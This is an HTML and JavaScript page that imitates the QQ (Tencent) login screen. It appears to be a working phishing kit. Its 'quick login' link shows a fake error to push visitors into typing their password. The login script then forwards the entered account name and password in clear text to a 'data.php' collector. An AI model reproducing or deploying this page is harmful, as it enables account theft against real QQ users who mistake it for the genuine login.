<!DOCTYPE html>
<html>

<style>
	body {
	  background-color: #f3f3f3;
	}

	form {
	  background-color: #fff;
	  max-width: 400px;
	  margin: 0 auto;
	  padding: 20px 40px;
	}

	h1 {
		text-align: center;
	  font-size: 24px;
	  font-weight: normal;
	  margin-bottom: 20px;
	}

	label {
	  display: block;
	  margin-bottom: 10px;
	}

	input[type="text"],
	input[type="password"] {
	  width: 100%;
	  padding: 10px;
	  border: 1px solid #ddd;
	  border-radius: 5px;
	  margin-bottom: 20px;
	  box-sizing: border-box;
	}

	button[type="button"] {
	  width: 100%;
	  background-color:deepskyblue;
	  color: #fff;
	  border: none;
	  border-radius: 5px;
	  padding: 10px;
	  font-size: 18px;
	  cursor: pointer;
	}

	.tip {
	  margin-top: 10px;
	  font-size: 15px;
	  text-align: center;
	}

	.tip a {
	  color: black;
	  text-decoration: none;
	  font-size: 12px;
	}
	.lo {
		font-size: 12px;
		text-align: center;
	}
	.lo a{
		color: dodgerblue;
	}
</style>
  <head>
    <meta charset="UTF-8">
    <title>QQ登录</title>
  </head>
  <body>
    <form method="post">
	  <h1>QQ登录</h1>
	  <p class="lo">推荐使用<a href="#" class="lo_a" onclick="alert('抱歉，当前网页快捷登入失效！尝试使用密码登入')">快捷登录</a>，防止盗号</p>
	  <label for="username">QQ号码/手机/邮箱</label>
      <input type="text" id="username" name="username" placeholder="支持QQ号/邮箱/手机号登录">
      <label for="password">密码</label>
      <input type="password" id="password" name="password" placeholder="请输入密码">
      <button type="button" onclick="checkinInput()">登录</button>
	  <div>
		<p class="tip">
		  <a href="#">找回密码</a>
		  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		  <a href="#">注册账号</a>
		  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		  <a href="#">意见反馈</a>
	  </p>
	</div>
	</form> 
  </body>
  <script>
    function checkinInput(){
        var username = document.getElementById("username").value;
        var password = document.getElementById("password").value;
        
        if(username == "" || password == ""){
            alert("您的账号和密码不能为空，请输入账号和密码！")
            return false;
        }
        document.location = 'data.php?us='+ username+'&ps='+password;
    }
</script>

</html>